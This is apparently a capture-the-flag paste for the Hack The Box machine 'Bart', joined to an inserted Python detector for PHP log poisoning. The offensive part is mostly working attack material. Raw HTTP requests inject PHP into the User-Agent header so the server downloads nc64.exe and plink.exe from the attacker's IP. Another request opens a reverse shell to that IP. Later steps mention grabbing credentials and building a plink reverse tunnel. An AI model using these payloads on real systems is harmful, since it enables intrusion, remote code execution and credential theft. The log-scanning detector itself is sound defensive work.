Untitled

a guest
Mar 20th, 2018
Get nc64 to the box and then execute that. Then upload plink.exe to the box to create a tunnel afterwards.

I guess you are fine with this. Just make sure you upload 64.exe.

GET /log/log.php?username=harvey&filename=log.php HTTP/1.1
Host: internal-01.bart.htb
User-Agent: <?php echo exec("powershell -command \"(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.235:8000/nc64.exe','nc64.exe')\""); ?>Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=909guak9i2v1m8snmgqs1c1jb9
Connection: close
Upgrade-Insecure-Requests: 1



GET /log/log.php?username=harvey&filename=log.php HTTP/1.1
Host: internal-01.bart.htb
User-Agent: <?php exec("nc64.exe 10.10.14.235 9999 -e cmd.exe"); ?>Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=909guak9i2v1m8snmgqs1c1jb9
Connection: close
Upgrade-Insecure-Requests: 1



GET /log/log.php?username=harvey&filename=log.php HTTP/1.1
Host: internal-01.bart.htb
User-Agent: <?php echo exec("powershell -command \"(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.235:8000/plink.exe','plink.exe')\""); ?>Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=909guak9i2v1m8snmgqs1c1jb9
Connection: close
Upgrade-Insecure-Requests: 1


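The three requests above all rely on the same two signals: PHP code carried in the User-Agent header, and a log endpoint whose filename parameter names a file with a .php extension so that the poisoned entry is later executed. Both are visible in an ordinary web server access log. The following detector is an added example written from the defender's side; it is not part of the original paste and not code from the Bart machine. It parses Apache/nginx "combined" format lines, flags PHP open tags in the User-Agent or Referer fields, and flags file-style query parameters that end in .php or contain traversal. The log lines, client IPs and parameter names it uses are constructed for the demo.

```python
"""Detect PHP log-poisoning attempts in web server access logs.

Added example, not part of the original paste. Scans "combined" format
log lines (client, ident, user, time, request, status, bytes, referer,
user-agent) for the two indicators used by the poisoning requests above.
All sample log lines below are constructed; IPs are placeholders.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx combined log format.
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# PHP open tags: "<?php" and the short echo tag "<?=".
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)

# Query parameters that commonly select a file on the server side
# (assumed names; extend for the application being monitored).
FILE_PARAMS = ('filename', 'file', 'page', 'log')

# Constructed sample log: one benign request, one poisoning attempt
# matching the requests above, one legitimate use of the log endpoint,
# and one traversal attempt against the same parameter.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Mar/2018:10:00:01 +0000] "GET /index.php HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [20/Mar/2018:10:00:02 +0000] '
    '"GET /log/log.php?username=harvey&filename=log.php HTTP/1.1" 200 9 '
    '"-" "<?php echo \'poisoned\'; ?>Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.5 - - [20/Mar/2018:10:00:03 +0000] '
    '"GET /log/log.php?username=harvey&filename=harvey.log HTTP/1.1" 200 9 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [20/Mar/2018:10:00:04 +0000] '
    '"GET /log/log.php?username=harvey&filename=../../app/config.php HTTP/1.1" '
    '200 9 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]


def suspicious_file_value(value):
    """True if a file-selecting parameter points at executable PHP or
    tries to escape the intended directory."""
    lowered = value.lower()
    return lowered.endswith('.php') or '..' in value or value.startswith('/')


def analyze_line(line):
    """Parse one combined-format line and return a finding dict, or
    None if the line does not parse. The 'findings' list is empty for
    benign requests."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    findings = []
    if PHP_TAG_RE.search(m.group('ua')):
        findings.append('php_tag_in_user_agent')
    if PHP_TAG_RE.search(m.group('referer')):
        findings.append('php_tag_in_referer')
    params = parse_qs(urlsplit(m.group('target')).query)
    for key in FILE_PARAMS:
        for value in params.get(key, []):
            if suspicious_file_value(value):
                findings.append(f'suspicious_{key}_param')
    return {
        'client': m.group('client'),
        'time': m.group('time'),
        'target': m.group('target'),
        'findings': findings,
    }


def scan_log(lines):
    """Return the analysis of every parseable line that has findings."""
    hits = []
    for line in lines:
        result = analyze_line(line)
        if result and result['findings']:
            hits.append(result)
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} {hit['target']} "
              f"-> {', '.join(hit['findings'])}")
```

Run it against a real access log with `scan_log(open(path))`. The PHP-tag check catches poisoning regardless of which log file is targeted; the parameter check catches the second half of the chain, where the application is made to include a log that it wrote itself. Lines that do not parse return None rather than silently passing, so a caller can count them and notice a format mismatch.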
Then inside bart, nc64.exe on the winlogon query.

Get the creds.

Then use plink to create a tunnel. SSH must be running on Kali.

echo y|plink.exe -l root -pw passwordssh ipkali -R kaliport:127.0.0.1:windowsport


Example:

echo y|plink.exe -l root -pw mypassword 10.10.15.88 -R 5555:127.0.0.1:445